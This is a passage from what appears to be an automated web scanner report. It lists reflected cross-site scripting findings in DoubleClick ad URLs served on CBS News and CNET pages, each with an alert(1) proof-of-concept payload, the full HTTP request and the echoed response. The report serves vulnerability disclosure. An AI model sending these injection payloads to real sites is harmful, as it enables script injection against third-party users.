The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 404ce"-alert(1)-"ab245d7300d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/160/%2a/r%3B234979442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra
...[SNIP]...

3.111. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d202"-alert(1)-"0e7554cedd3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
9442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641
...[SNIP]...

3.112. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b5c"-alert(1)-"693c8060cdc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=
...[SNIP]...

3.113. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72656"-alert(1)-"4f84709e101 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;

...[SNIP]...

3.114. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c48'-alert(1)-'d6f94ea770e was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.115. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4704"-alert(1)-"c0ca4634e03 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.116. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf37"-alert(1)-"dd1f54e8ddd was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.117. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c58a'-alert(1)-'e02ed8d2af6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.118. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b88b2'-alert(1)-'0ab3a2f4648 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.119. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5db19"-alert(1)-"34a1cc021fa was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_130384842
...[SNIP]...

3.120. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839f6"-alert(1)-"d40e86f6f52 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

